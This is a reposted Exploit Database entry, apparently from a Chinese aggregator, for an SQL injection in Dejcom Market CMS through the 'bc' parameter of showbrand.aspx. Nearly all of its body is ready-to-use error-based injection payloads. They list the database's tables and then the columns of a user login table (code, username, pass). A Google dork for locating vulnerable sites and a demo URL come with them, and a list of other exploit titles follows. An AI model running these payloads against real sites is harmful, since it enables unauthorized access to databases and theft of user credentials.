Dejcom Market CMS – ‘showbrand.aspx’ SQL Injection

Exploit Database
12 阅读

作者： Mormoroth

日期： 2010-12-04
类别：
- webapps
平台：
- asp
来源：https://www.exploit-db.com/exploits/15673/

# Exploit Title: [Dejcom Market Cms SQL injection]
# Date: [01/12/2010]
# Author: [Mormoroth]
# Dork : "Powered By Dejcom Market CMS"
# Version: [ALL Version]
 Exploit:

 %27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge','COMMENTS','filegroup','files','groups','khabarname','khat','links','login'))--

showbrand.aspx?bc=%27 or 1=(select top 1 column_name from information_schema.columns where table_name='loguser' and column_name not in('code','username','pass'))--

Demo : http://server/showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge'))--
---------------------
Persian Gulf forever
ISCN TEAM
We are Mormoroth - Magicboy

last Exploits
Dejcom Market CMS – ‘showbrand.aspx’ SQL Injection的更多信息

Emagic Data Center Management Suite v6.0 – OS Command Injection：
WordPress Plugin Advanced-Custom-Fields 5.7.7 – Cross-Site Scripting：
MassMirror Uploader – Multiple Remote File Inclusions：
vBshop – Multiple Persistent Cross-Site Scripting Vulnerabilities：
ZeewaysCMS – Multiple Vulnerabilities：
Broadlight Residential Gateway DI3124 – Remote DNS Change：
Joomla! Plugin Beatz 1.1 – Multiple Cross-Site Scripting Vulnerabilities：
COMMAX Smart Home Ruvie CCTV Bridge DVR Service – Config Write / DoS (Unauthenticated)：